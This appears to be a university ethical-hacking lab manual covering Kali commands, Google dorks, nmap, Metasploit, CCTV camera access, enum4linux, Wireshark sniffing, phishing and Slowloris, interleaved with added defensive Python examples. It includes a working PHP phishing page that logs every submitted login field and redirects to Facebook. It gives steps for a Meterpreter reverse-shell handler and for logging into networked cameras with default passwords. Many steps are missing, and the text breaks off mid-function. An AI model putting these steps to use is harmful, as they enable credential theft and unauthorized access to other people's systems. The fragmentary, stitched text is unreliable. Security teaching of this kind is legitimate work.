Ethical Hacking Lab Manual B6215
Course Objectives:
List of Experiments:
Course Outcomes:
Lab Objectives: The objective of this lab is to demonstrate how to use basic Linux
commands in the terminal.
Theory: Kali Linux is a Linux distribution designed for digital forensics and penetration
testing. It is maintained and funded by Offensive Security. It was developed by Mati Aharoni
and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous
information security testing Linux distribution, which was based on Knoppix. The tagline of
Kali Linux and BackTrack is "The quieter you become, the more you are able to hear".
Kali Linux is based on the Debian Testing branch: most packages Kali uses are imported
from the Debian repositories. Kali Linux ships approximately 600 penetration-testing programs
(tools), including Armitage, Nmap, Wireshark, Metasploit, John the Ripper, sqlmap,
Aircrack-ng, Burp Suite, etc.
The following table provides a very brief list of the standard, well-known, and defined
top-level Kali Linux directories and their purposes. Referencing those directories when
accessing them is accomplished by using the sequentially deeper directory names connected by
forward slashes (/) such as /var/log and /var/spool/mail. These are called paths.
Directory: Description
/ (root of the filesystem): The root filesystem is the top-level directory of the filesystem. It contains all the files required to boot the Linux system before other filesystems are mounted. It must include all of the executables and libraries required to boot the remaining filesystems. After the system is booted, all other filesystems are mounted on standard, well-defined mount points as subdirectories of the root filesystem.
/root: This is not the root (/) filesystem. It is the home directory of the root user.
/home: Home directory storage for user files. Each user has a subdirectory in /home.
/home/kali: This is the default directory in the terminal. It is represented by the ~ symbol.
/bin: The /bin directory contains user executable files, e.g. ls, cd, mv.
/sbin: System binary files. These are executables used for system administration.
/etc: Contains the local system configuration files for the host computer.
/tmp: Temporary directory. Used by the operating system and many programs to store temporary files.
/usr: Shareable, read-only files, including executable binaries and libraries, man files, and other types of documentation.
/usr/bin: Contains all the Kali Linux applications (apt, nmap, etc.).
/usr/share: Contains the application support and data files.
/lib: Contains shared library files that are required to boot the system.
/var: Variable data files are stored here. This can include things like log files, MySQL and other database files, web server data files, email inboxes, and much more.
/boot: Contains the static bootloader and kernel executable and configuration files required to boot a Linux computer.
/dev: Contains the device files for every hardware device attached to the system. These are not device drivers; rather, they are files that represent each device on the computer and facilitate access to those devices.
/media: A place to mount external removable media devices such as USB thumb drives that may be connected to the host.
/mnt: A temporary mountpoint for regular filesystems (i.e. not removable media) that can be used while the administrator is repairing or working on a filesystem.
/opt: Optional files such as vendor-supplied application programs should be located here.
Step1: Log into the Kali Linux machine and open a Terminal window.
Command2: Type ifconfig and hit enter to see the IP address of the host system.
Command3: Type pwd and hit enter to print the (present) working directory.
Command4: Type sudo su and hit enter, then enter the password to switch from the present user
(kali) to the super user (root).
Command5: Type exit and hit enter to return from the root user to the normal user (kali).
Command6: Type ls and hit enter to list the files and folders in the current directory.
Command8: Type cd .. and hit enter to go one level up from the current working directory.
Command9: Type nano <filename.txt> and hit enter; it will open the editor.
Enter the text that you want to save in that text file.
Press Ctrl+S to save and Ctrl+X to exit the editor.
Command10: Type cat <filename.txt> and hit enter to see what is in that text file.
Command11: Type mkdir <directory name> and hit enter. It will create one directory/folder.
Command12: Type rm <filename.txt> and hit enter to delete the text file.
Command13: Type rmdir <directory name> and hit enter to delete that directory/folder.
Command14: Type cp <filename.txt> <folder name> and hit enter. It will copy the file into
that folder. Note: We can copy all types of files using this command.
Command15: Type mv <filename.txt> <folder name> and hit enter. It will move the file to
that folder. Note: We can move all types of files using this command.
Command16: Type history and hit enter. It will show all the commands that we used in that
terminal.
Step2: Close the Terminal window and log out from the Kali Linux machine.
Viva Questions:
Lab Objectives: The objective of this lab is to demonstrate how to use different types of
dorks for collecting information about a target.
Theory: Google dorking, also called Google hacking, is a search-hacking technique that
uses advanced search queries to uncover hidden information in Google. Google dorks, or
Google hacks, refer to the specific search commands (including special parameters and
search operators) that when entered into the Google search bar reveal hidden parts of
websites.
Google dorking is used to find hidden information that is otherwise inaccessible through a
normal Google search. Google dorks can reveal sensitive or private information about
websites and the companies, organizations, and individuals that own and operate them.
When Google crawls the web to index pages for its search engine, it can see parts of websites
that normal internet users can’t. Google dorks and Google hacks uncover some of that hidden
data, letting you see information that organizations, companies, and website owners may not
want you to see.
A simple example of an advanced search query is the use of quotation marks. Using quotation
marks in searches gives you a list of results that includes web pages where the complete
phrase is used, rather than some combination (complete or incomplete) of the individual
words you entered into the search field.
There are many more types of Google hacks using advanced search queries, but their
technical explanations don't actually get much more complicated than that. Their power lies
in the ability to use them creatively.
Google dorking is completely legal: it's just another form of searching, after all. Google
was built to handle advanced searches, and banning this functionality would limit information
access.
3. Inurl: Using "inurl:" will search only for pages with that specific text in their URL.
4. Intext: Using "intext:" in a search query will search only for pages containing the supplied
keywords. In the example below, all results listed will have the quoted text somewhere on the page.
5. Filetype: Using "filetype:" will narrow our search to the specific file type mentioned.
6. Index of: Using "Index of /" will find directory listings of files that companies have uploaded
to the internet; these files can be very crucial while pen testing.
Lab Objectives: The objective of this lab is to demonstrate how to use nmap commands for
different operations in network scanning.
Theory: Nmap, which stands for "Network Mapper", is an open-source tool that lets you
perform scans on local and remote networks. It is a security auditing tool used in the security
field to actively enumerate a target system/network. It is one of the most extensively used
tools by network administrators and, likewise, by attackers for reconnaissance (enumeration),
the first step in the 5 phases of hacking. Nmap is used to actively probe the target network for
active hosts (host discovery), port scanning, OS detection, version details, and active services
running on the hosts that are up. For this, Nmap uses the technique of sending packets and
analyzing the responses.
Port scanning is one of the features of Nmap wherein the tool detects the status of the ports
on active hosts in a network. The status of a port can be open, filtered, or closed. Type
nmap in the command line to run Nmap. Add the necessary switches according to the scanning
type to initiate a specific scan technique.
Open: The open status means that the given port is open and is actively running a
service.
Filtered: The filtered status means that the respective port might be hidden behind a
firewall and its status remains unknown.
Closed: The closed state indicates that the given port is closed on the host machine.
Procedure: Open the terminal in Kali Linux and install the nmap tool.
This is a simple scan in which we get the open ports, the state and service of each port, and
the MAC address. It also shows whether the host is up or not. We can also scan a whole IP range.
Note: By default, nmap scans for TCP ports (10000) only.
Command 2: nmap -v <IP Address>
-v stands for verbose, which is used to print more information about the scan in progress. We
can use the -v or -vv (very verbose) options to increase the verbosity of the output.
This command will scan and show the operating system's information in detail.
Command 5: nmap -sV <IP Address>
This command performs version detection on all the scanned ports.
-T0, -T1, -T2, -T3, -T4 and -T5 are the timing flags that make the scan slower or faster
depending on the flag.
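The three port states above are how a scan report is read. As an added example, not part of the manual, this Python script parses the port table of nmap's normal text output and tallies the states, including the ports nmap folds into its "Not shown" summary line; the sample report is constructed, not captured from a real host.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample of the report a plain "nmap -sV <IP Address>" run prints.
# It is illustrative text, not output captured from a real host.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.56.101
Host is up (0.00042s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE    SERVICE      VERSION
22/tcp   open     ssh          OpenSSH 8.9p1
80/tcp   open     http         Apache httpd 2.4.52
135/tcp  filtered msrpc
445/tcp  filtered microsoft-ds
3306/tcp closed   mysql
MAC Address: 08:00:27:12:34:56 (Oracle VirtualBox virtual NIC)
"""

# One row of the PORT/STATE/SERVICE table; the VERSION column is present only with -sV.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)
# Summary row for the ports nmap does not list one by one.
NOT_SHOWN = re.compile(r"^Not shown: (?P<count>\d+) (?P<state>open|closed|filtered) ")


@dataclass(frozen=True)
class PortResult:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_output(text: str) -> list:
    """Every port nmap listed individually, in the order printed."""
    results = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            results.append(PortResult(int(m["port"]), m["proto"], m["state"],
                                      m["service"], (m["version"] or "").strip()))
    return results


def state_counts(text: str) -> Counter:
    """Ports per state, including those folded into the 'Not shown' summary row.
    Without that row the closed count would read 1 instead of 996 and misstate how
    much of the scanned range actually answered with a reset."""
    counts = Counter(r.state for r in parse_nmap_output(text))
    for line in text.splitlines():
        m = NOT_SHOWN.match(line.strip())
        if m:
            counts[m["state"]] += int(m["count"])
    return counts


def exposed_services(text: str) -> list:
    """Services on open ports: the reachable attack surface a defender should review."""
    return [r.service for r in parse_nmap_output(text) if r.state == "open"]


if __name__ == "__main__":
    for r in parse_nmap_output(SAMPLE_NMAP_OUTPUT):
        print(f"{r.port}/{r.proto}\t{r.state}\t{r.service}\t{r.version}")
    print("state counts:", dict(state_counts(SAMPLE_NMAP_OUTPUT)))
    print("exposed:", exposed_services(SAMPLE_NMAP_OUTPUT))
```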
Viva Questions:
3. How many types of port statuses are there and what are they?
Lab Requirements: Windows system, Kali Linux running as a virtual machine, MSF venom
and MSF console.
MSF console:
MSF console provides a command line interface to access and work with the Metasploit
Framework. The MSF console is the most commonly used interface to work with the
Metasploit Framework. The console lets you do things like scan targets, exploit
vulnerabilities, and collect data.
Modules are the core components of the Metasploit Framework. A module is a piece of
software that can perform a specific action, such as scanning or exploiting. Each task that you
can perform with the Metasploit Framework is defined within a module.
There are a few types of modules. The module type depends on the purpose of the module
and the type of action that the module performs. The following are module types that are
available in the Metasploit Framework:
MSF venom:
MSF venom is a standalone payload generator. It is a combination of msfpayload and
msfencode. It is fast and uses a single instance. It also has a standardized command line and
core options. You can generate payloads for many platforms like Cisco, Android, Mac OS,
Solaris, Firefox, Windows, Unix, Node.js and many more. When creating an MSF payload,
there are three common payloads that you would utilize.
The first one is a bind shell. A bind shell is a payload that opens up a new service on the
target machine and requires the attacker to connect to it in order to get a session.
Then, of course, we have the reverse TCP payload. A reverse shell (also known as a
connect-back) is the exact opposite: it requires the attacker to set up a listener first on
his/her box; the target machine acts as a client connecting to that listener, and then
finally the attacker receives the shell.
Then we also have the HTTPS payload. What if the victim blocks the TCP and bind
ports? In that case we have the HTTPS port, 443, which is open.
Once the payload is generated, it is sent to the victim for execution. When the file is executed
on the victim machine, it will give you a Meterpreter session, starting from the meterpreter > prompt.
Procedure: First of all, check the IP address of the Kali Linux machine and note it down
(Ex: 192.168.31.128).
Step1: To create a TCP reverse connection payload, run the following command
Step4: Use an appropriate handler for our payload. Ex: use exploit/multi/handler
Step5: Set an appropriate payload for our handler. Ex: set payload windows/meterpreter/reverse_tcp
Step6: Now we need to set some payload options like LHOST and LPORT.
Step7: To set LHOST, run the set LHOST <IP Address> command; to set LPORT, run the set
LPORT 1234 command, and then verify the options again.
Step8: To start listening, type run and hit enter.
Step9: Now on the Windows machine, download and run the exe file once. It will
create one session in msfconsole and open a meterpreter session there.
Step10: Now we have complete control of the victim machine. Here we have different
options to perform on the victim machine. To see them, type help and hit enter.
Not only this, we get more commands that we can execute on the victim machine. Ex: the
sysinfo command will display the victim's system details.
Like this, try and practice all the commands that are available there.
Viva Questions:
2. What is msfvenom?
3. What is msfconsole?
6. What is a Payload?
Experiment No. 5
Aim: Perform CCTV hacking using the Advanced IP Scanner tool.
Lab Objectives: The objective of this lab is to know how weak or default credentials are
used in the process of CCTV camera hacking.
Lab Requirements: Advanced IP Scanner tool, IE Tab extension in Chrome browser, and
Camera plug-ins.
Theory: Closed-circuit television (CCTV) surveillance is one of many investments that more
businesses are prioritizing when protecting their facilities. While it can prove invaluable at
securing our premises and preventing unwanted intrusion or trespassing, one often invisible
threat can hoodwink even the most experienced operatives in the game. It’s ironic
considering video surveillance is meant to prevent unwanted access.
While considerable advances have been made in the world of digital transformation, highly
sophisticated technology like CCTV camera equipment is worryingly vulnerable to hacks.
Cybercriminals and malicious actors have found new techniques to bypass strict security
protocols and gain remote access to a business's video surveillance systems.
As these systems often keep a proverbial “watchful eye” on valuable assets or entry and exit
points of businesses, it’s crucial to ensure that these modern and innovative camera systems
don’t present themselves as easy bait for cybercriminals.
While some malicious actors may use a simple exploitation method, many of their tactics are
intricate and complex, making it increasingly hard for cybersecurity professionals to detect,
much less contain. Once a surveillance network is compromised, a hacker can monitor our
estate or take control of it. Many organizations are concerningly behind when it comes to
safeguarding their camera equipment, wrongly believing that this technology is inherently
fool-proof and cannot possibly fall into the wrong hands. Sadly, the opposite is very much
true. Let’s look at some of the common vulnerabilities that exist within a business’s CCTV
camera setup.
Remote Hacks: If an IoT (Internet of Things) camera transmits video feeds via the
internet, hackers may find their way into the system through the online IP address
after obtaining the signature information and default password, which many
businesses do not change (more on this later) and which are often not supported by
two-factor authentication (2FA).
Local Hacks: CCTV cameras are often hooked into a network wireless router with a
built-in modem, and organizations do not always update the default network name
and password. If a hacker cannot gain access to the cameras themselves, they can
access the network and weave their way into the cameras that are connected to it.
They will often spoof the wireless network into thinking they are registering an
authentic device, or try and overload the network by denial-of-service (DoS).
Backdoor Attacks: Backdoors provide unauthorized access to a computer system or
encrypted data that bypasses the infrastructure’s primary security controls. Backdoors
may often be created for the purposes of legitimate troubleshooting or remote access
in the event of a fault. However, threat actors can locate these backdoors, often as a
result of unpatched or outdated security software, firewalls, and firmware. Hackers
can usually spot these vulnerabilities with ease.
Brute Force: These types of attacks occur when hackers try to guess an
administrator’s login credentials manually, often with the assistance of algorithms that
can make numerous guesses within seconds. Whether the username is used alongside
passwords or PIN combinations, many organizations fail to adopt a strong password
policy for all of their users’ shared equipment, meaning that default passwords like
“1234,” “password,” “0000,” or “administrator” are very easy to exploit.
Procedure:
It will show all the shared folders, printers, scanners, servers, routers, RDPs, CCTV
cameras and so on. It will also show the live and dead devices on that specific network.
Step5: Double-click on your target link. It will open in the Chrome browser. Do not try to
log in here.
Click on Extensions and select IE Tab. We should open the camera in IE Tab only.
Ex: Usernames: admin, Admin; Passwords: admin, admin@123, admin123, 12345, 123456.
If the entered username and password are correct, it will open the Live View.
Note: We can perform a number of different operations using this dashboard.
Note: Do not change anything, because if you change anything you will be behind bars.
Viva Questions:
Lab Objectives: The main objective of this lab is to better understand the management of a
domain.
Theory:
Nslookup:
Nslookup (stands for “Name Server Lookup”) is a useful command for getting information
from the DNS server. It is a network administration tool for querying the Domain Name
System (DNS) to obtain domain name or IP address mapping or any other specific DNS
record. It is also used to troubleshoot DNS-related problems.
Nslookup syntax:
The Nslookup syntax is very simple, and we can use it the same way on different OSes.
(or)
Options: First, we will put the option we want to use with the domain name or IP address.
The option can be related to the type of DNS record, timeout, a port in use, debugging, or
another.
Name: Here we will put the hostname (domain name) or IP address. It is the target of our
DNS query.
Additional Options: Depending on the query, we can add an extra option as a parameter.
Server: We can use the default server for our query or specify another one from where we
want the DNS query to be performed.
The Nslookup command is a very popular and powerful tool. So, it is not a surprise that a lot
of administrators use it for testing and troubleshooting their networks. There are two main
reasons why we need to use the Nslookup command.
The first one is obviously for troubleshooting server connections. Thanks to its
beneficial functionalities, we can get the information we need quickly. In addition, it
is extremely easy to use, and it is available on every operating system (OS).
The second reason is not so obvious, but it should not be neglected. That is security
and safety. It can be helpful for protecting against different phishing attacks, which
involve falsifying a domain name. Attackers use a misspelled domain name or trick
users by adding or omitting a hyphen. Some examples are when they substitute the
numeral 1 for a lowercase l (examp1e.com), or the phishing domain could be
insta-gram.com instead of instagram.com. These tactics are used to trick regular users and
make an unfriendly site look friendly and familiar.
Nslookup can also help to prevent another malicious attempt, DNS cache poisoning.
With this attack, criminals place fraudulent data and distribute it to the DNS recursive
servers, pointing to a fake authoritative server.
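Nslookup resolves whatever name it is given; spotting a lookalike before trusting it is the defender's task. As an added example, not from the manual, this Python checker flags the two tricks described above (the numeral 1 for a lowercase l, an inserted hyphen) and a few related ones against a watch-list of legitimate domains; the watch-list and the candidate names are constructed for the demonstration.

```python
# Characters phishers substitute because they look alike. The manual's own examples
# are the numeral 1 for a lowercase l and an inserted hyphen.
CONFUSABLES = str.maketrans({"1": "l", "|": "l", "0": "o", "3": "e", "@": "a", "5": "s", "$": "s"})

# Constructed watch-list of domains we want to protect users from lookalikes of.
WATCH_LIST = ["example.com", "instagram.com", "cloudns.net"]


def labels_of(domain: str) -> list:
    return domain.strip().lower().rstrip(".").split(".")


def registrable(domain: str) -> str:
    """Last two labels: 'www.instagram.com' -> 'instagram.com'."""
    return ".".join(labels_of(domain)[-2:])


def brand_label(domain: str) -> str:
    """The label a user actually reads: 'instagram' out of 'instagram.com'."""
    labels = labels_of(domain)
    return labels[-2] if len(labels) >= 2 else labels[0]


def canonical(label: str) -> str:
    """Fold confusable characters and drop hyphens, so examp1e == example
    and insta-gram == instagram."""
    return label.translate(CONFUSABLES).replace("-", "")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character typos such as instagran."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str, watch_list=WATCH_LIST) -> tuple:
    """Return (verdict, matched_brand). Verdicts are checked in this order:
    legitimate, tld_swap, homoglyph_or_hyphen, typosquat, brand_as_subdomain, unrelated."""
    reg = registrable(domain)
    label = brand_label(domain)
    for brand in watch_list:
        if reg == registrable(brand):
            return ("legitimate", brand)
    for brand in watch_list:
        b = brand_label(brand)
        if label == b:
            return ("tld_swap", brand)
        if canonical(label) == canonical(b):
            return ("homoglyph_or_hyphen", brand)
        if len(b) >= 5 and levenshtein(canonical(label), canonical(b)) == 1:
            return ("typosquat", brand)
        # The real brand appears, but only as a subdomain of someone else's domain.
        if b in labels_of(domain)[:-2]:
            return ("brand_as_subdomain", brand)
    return ("unrelated", None)


if __name__ == "__main__":
    # Constructed candidates: the manual's two examples plus other common tricks.
    for d in ["www.instagram.com", "examp1e.com", "insta-gram.com", "instagram.net",
              "instagran.com", "instagram.com.login-verify.net", "kali.org"]:
        print(f"{d:35} -> {classify(d)}")
```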
Procedure:
We can use this command to see how many A records are there and see the IP Addresses of
each one.
By checking the NS records, we can see which is the authoritative server for a specific
domain.
With this one, we can see the start of authority and get information about the zone.
Command: nslookup -type=soa cloudns.net
No 4: To find the MX records responsible for the email exchange.
Here we are checking the MX records of the mail servers. We can see if all the mail servers
are working well.
Many times we check the A records to see the IPs of a domain, but sometimes we need to
verify whether an IP address is related to a specific domain. For that purpose, we need a
reverse DNS lookup.
We can manually choose the timeout in seconds. We can increase it to give the server more
time to respond. We can also shorten it to see which servers respond more quickly.
Debug mode provides important and detailed information both for the question and for the
received answer.
Lab Objectives: The objective of this lab is to help students understand and apply various
enumeration techniques to enumerate:
Connected devices
Hostname and information
Domain
Hardware and storage information
Software components
Total Memory
Theory: The Enum4linux tool is an alternative to enum.exe for enumerating data from
Windows and Samba hosts.
Overview:
Enum4linux is a tool for enumerating information from Windows and Samba systems. It
attempts to offer similar functionality to enum.exe formerly available from
www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient,
net and nmblookup.
Dependencies:
We need to have the Samba package installed as this script is basically just a wrapper around
rpcclient, net, nmblookup and smbclient.
The following command will attempt to enumerate information provided valid login
credentials.
Command Reference:
Username: john
Password: password123
Command:
Procedure: Open the Kali Linux Terminal window (or go to Applications -> 01-Information
Gathering -> SMB Analysis -> enum4linux).
Step1: In the terminal window, type the enum4linux -h command and hit Enter to get the help
options of enum4linux.
The help options appear as shown in the screenshot. In this lab, we will demonstrate only a
few options to conduct enumeration on the target machine.
Step2: Type enum4linux <IP Address> and hit enter. We will get all the information about
our target machine here.
Step3: Type enum4linux -U <IP Address> and hit enter to see the user list on that target
machine.
Step4: Type enum4linux -P <IP Address> and hit enter to see the password policy
information of that target machine.
Step5: Type enum4linux -S <IP Address> and hit enter to see the share list on that target
machine.
Step6: Type enum4linux -G <IP Address> and hit enter to see the group and member list on
that target machine.
Step7: Type enum4linux -a <IP Address> and hit enter to do all simple enumeration
(-U -S -G -P -r -o -n -i) on that target machine.
Step8: Type enum4linux -U -o <IP Address> and hit enter to see the user list and OS details
of that target machine.
Viva Questions:
1. What is an Enumeration?
Lab Objective: The objective of this practical is to study and understand the concept of
network sniffing using Wireshark.
Theory: Computers communicate using networks. These networks could be on a local area
network (LAN) or exposed to the internet. Network sniffers are programs that capture
low-level packet data that is transmitted over a network. An attacker can analyze this
information to discover valuable information such as user IDs and passwords.
Network sniffing is the process of capturing data packets sent over a network. This can
be done by a specialized software program or by hardware equipment. Sniffing can be used to:
The above protocols are vulnerable if login details are sent in plain text.
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting,
analysis, software and communications protocol development, and education. Wireshark is
cross-platform, using the Qt widget toolkit in current releases to implement its user interface
and pcap to capture packets; it runs on Linux, macOS, BSD, Solaris, some other Unix-like
operating systems, and Microsoft Windows. There is also a terminal-based (non-GUI) version
called TShark. Wireshark is used to capture and analyse packets in a network. It is also used as
a sniffer, network protocol analyzer, and network analyzer. We can also apply specific filters
to network traffic to get more narrowly filtered data packets.
Color Coding:
Different packets are seen highlighted in various different colors. This is Wireshark’s way of
displaying traffic to help you easily identify the types of it. Default colors are:
To check the color coding rules, click on View and select Coloring Rules. These color-coding
rules can be customized and modified to fit your needs.
Procedure:
Step1: Open the terminal in Kali Linux, type wireshark and hit enter to open the tool.
Step2: Select eth0 and click on the Start capturing packets icon. It will start capturing.
Step3: Now start any browser and open this webpage: http://testphp.vulnweb.com/login.php.
Step4: Enter a username and password and click on the login button.
Step5: Now get back to the Wireshark tool and click on the Stop capturing packets icon.
Step6: Now type http.request.method == "POST" in the display filter bar and hit enter.
Step7: Click on HTML Form URL Encoded. We can see the previously entered username
and password here.
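The display filter above selects POST requests, and the form body Wireshark then shows under HTML Form URL Encoded is readable only because the site uses plain HTTP. As an added example, not from the manual, this Python code performs the same selection and decoding on reassembled request text and reports, with the secret redacted, every login that crossed the wire unencrypted; the two requests are constructed, and the paths and field names are assumptions.

```python
from urllib.parse import parse_qs

# Form field names that indicate a credential is being submitted (assumed list).
SENSITIVE_FIELDS = {"pass", "password", "passwd", "pwd", "pin", "secret", "token"}
USERNAME_FIELDS = {"uname", "user", "username", "email", "login"}

# Constructed sample: two HTTP requests as they would appear once Wireshark has
# reassembled them. Paths and field names are illustrative, not captured values.
SAMPLE_REQUESTS = [
    "GET /login.php HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n",
    "POST /userinfo.php HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "uname=test&pass=s3cret%21",
]


def parse_request(raw: str) -> dict:
    """Split one HTTP/1.1 request message into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers:  # ignore anything beyond the declared body
        body = body[: int(headers["content-length"])]
    return {"method": method, "target": target, "headers": headers, "body": body}


def is_form_post(req: dict) -> bool:
    """Same selection as the display filter http.request.method == "POST", narrowed
    to the bodies Wireshark shows under "HTML Form URL Encoded"."""
    ctype = req["headers"].get("content-type", "")
    return req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded")


def form_fields(req: dict) -> dict:
    """Decode the urlencoded body: exactly what anyone sniffing the path can read."""
    if not is_form_post(req):
        return {}
    return {k: v[0] for k, v in parse_qs(req["body"], keep_blank_values=True).items()}


def find_plaintext_credentials(raw_requests) -> list:
    """One finding per POST carrying a credential field. The secret is not copied
    into the finding: an alert should prove exposure, not re-expose the value."""
    findings = []
    for raw in raw_requests:
        req = parse_request(raw)
        fields = form_fields(req)
        hits = [k for k in fields if k.lower() in SENSITIVE_FIELDS]
        if not hits:
            continue
        user = next((fields[k] for k in fields if k.lower() in USERNAME_FIELDS), None)
        findings.append({"host": req["headers"].get("host", ""), "target": req["target"],
                         "fields": hits, "username": user})
    return findings


if __name__ == "__main__":
    for finding in find_plaintext_credentials(SAMPLE_REQUESTS):
        print("plaintext credential submitted:", finding)
```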
Viva Questions:
1. What is Wireshark?
Lab Objectives: To know how to create social media login page for phishing attacks.
Theory: Phishing is a form of social engineering where attackers deceive people into
revealing sensitive information or installing malware such as ransomware. Phishing attacks
have become increasingly sophisticated and often transparently mirror the site being targeted,
allowing the attacker to observe everything while the victim is navigating the site, and to
traverse any additional security boundaries with the victim.
Types of Phishing:
Email Phishing: In an email phishing scam, the attacker sends an email that looks
legitimate, designed to trick the recipient into entering information in reply or on a
site that the hacker can use to steal or sell their data.
Spear Phishing: Spear phishing involves targeting a specific individual in an
organization to try to steal their login credentials. The attacker often first gathers
information about the person before starting the attack, such as their name, position,
and contact details.
Angler Phishing: Anglers use fake social media posts to get people to provide login
info or download malware.
Smishing: Smishing is phishing through some form of a text message or SMS.
Vishing: Vishing, which is short for "voice phishing," is when someone uses the
phone to try to steal information. The attacker may pretend to be a trusted friend or
relative or to represent them.
HTTPS Phishing: An HTTPS phishing attack is carried out by sending the victim an
email with a link to a fake website. The site may then be used to fool the victim into
entering their private information.
Pop-up Phishing: Pop-up phishing often uses a pop-up about a problem with your
computer’s security or some other issue to trick you into clicking. You are then
directed to download a file, which ends up being malware, or to call what is supposed
to be a support center.
Pharming: In a pharming attack, the victim gets malicious code installed on their
computer. This code then sends the victim to a fake website designed to gather their
login credentials.
Evil Twin Phishing: In an evil twin attack, the hacker sets up a false Wi-Fi network
that looks real. If someone logs in to it and enters sensitive details, the hacker captures
their info.
Watering Hole Phishing: In a watering hole phishing attack, a hacker figures out a
site a group of users tends to visit. They then use it to infect the users’ computers in
an attempt to penetrate the network.
Whaling: A whaling attack is a phishing attack that targets a senior executive. These
individuals often have deep access to sensitive areas of the network, so a successful
attack can result in access to valuable info.
Clone Phishing: A clone phishing attack involves a hacker making an identical copy
of a message the recipient already received. They may include something like
“resending this” and put a malicious link in the email.
Website Spoofing: With website spoofing, a hacker creates a fake website that looks
legitimate. When you use the site to log in to an account, your info is collected by the
attacker.
Domain Spoofing: Domain spoofing, also referred to as DNS spoofing, is when a
hacker imitates the domain of a company—either using email or a fake website—to
lure people into entering sensitive information. To prevent domain spoofing, you
should double-check the source of every link and email.
Deceptive Phishing: Deceptive phishers use deceptive technology to pretend they are
with a real company to inform the targets they are already experiencing a cyberattack.
The users then click on a malicious link, infecting their computer.
Image Phishing: Image phishing uses images with malicious files in them meant to
help a hacker steal your account info or infect your computer.
Search Engine Phishing: A search engine phishing attack involves an attacker
making fake products that look attractive. When these pop up in a search engine, the
target is asked to enter sensitive information before purchasing, which then goes to the
hacker.
Procedure:
Step1: First, open any social media website's login page, copy the source code and
save it with the name index.html. (In our case it is the Facebook login page.)
Step2: Create an empty text file (log.txt). This file helps us to save the credentials.
Step3: Create a PHP file named post.php to connect the HTML file with the text file and to
redirect to the original website.
post.php
<?php
// Append every submitted form field to log.txt as name=value, one field per line.
$file = fopen("log.txt", "a");
foreach ($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
// Send the visitor on to the original login page (see Step6); the exact URL is assumed here.
header("Location: https://www.facebook.com/login.php");
exit;
?>
Step4: Replace the action attribute value with post.php and leave the id attribute value empty
in the form tag of the index.html file.
Note: Save these three files in one folder (phishing) and put the folder in XAMPP's
htdocs folder.
Step5: Start XAMPP and open the folder in localhost using any browser.
Step6: Enter an email address or phone number and a password and click on Log in. It will
redirect to the original Facebook login page. (You can check it in the URL bar: the two URLs
are different, one is localhost and the other is the actual Facebook URL.)
1. What is phishing?
2. What is whaling?
3. What is smishing?
Lab Objectives: To know how an HTTP denial-of-service attack affects threaded servers.
Theory: Slowloris is a free and open-source tool available on GitHub. We can perform a
denial-of-service attack using this tool. It is a framework written in Python. This tool allows a
single machine to take down another machine's web server using perfectly legitimate HTTP
traffic. It makes a full TCP connection and then requires only a few hundred requests at
long-term and regular intervals. As a result, the tool does not need to spend a lot of traffic to
exhaust the available connections on a server.
Uses of Slowloris:
Slowloris sends multiple requests to the target and as a result generates heavy traffic, like a
botnet.
Slowloris can be used to perform DDoS attacks on any web server.
It is an open-source tool, so you can download it from GitHub free of cost.
It uses perfectly legitimate HTTP traffic.
A denial-of-service attack can be executed with the help of Slowloris by generating
heavy botnet-like traffic.
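The theory above explains the mechanism: each stalled connection occupies one worker of a threaded server until its request headers are complete. As an added example, written for this manual and not taken from the Slowloris project, this Python server shows the two controls that bound that damage, a deadline for completing the headers and a cap on concurrent workers; the deadline value, the worker cap and the stalled client request are assumptions made for the demonstration.

```python
import socket
import threading
import time

# Assumed values for the demonstration: seconds a client gets to finish its request
# headers, and the cap on concurrent worker threads.
HEADER_DEADLINE = 0.5
MAX_WORKERS = 16
RESPONSE_200 = b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\n\r\nok"
RESPONSE_408 = b"HTTP/1.1 408 Request Timeout\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"


def read_headers(conn, deadline=HEADER_DEADLINE):
    """Return the header block, or None if it is not complete before the deadline.
    The deadline spans the whole header, not each recv(), so a client that trickles
    one header line every few seconds (the Slowloris pattern) is still cut off."""
    end = time.monotonic() + deadline
    buf = b""
    while b"\r\n\r\n" not in buf:
        remaining = end - time.monotonic()
        if remaining <= 0 or len(buf) > 8192:  # deadline passed, or header absurdly large
            return None
        conn.settimeout(remaining)
        try:
            chunk = conn.recv(1024)
        except socket.timeout:
            return None
        if not chunk:  # peer closed without finishing
            return None
        buf += chunk
    return buf.split(b"\r\n\r\n", 1)[0]


def handle(conn, slots=None):
    """One worker: 200 for a complete request, 408 for a stalled one, then close
    and hand the worker slot back."""
    try:
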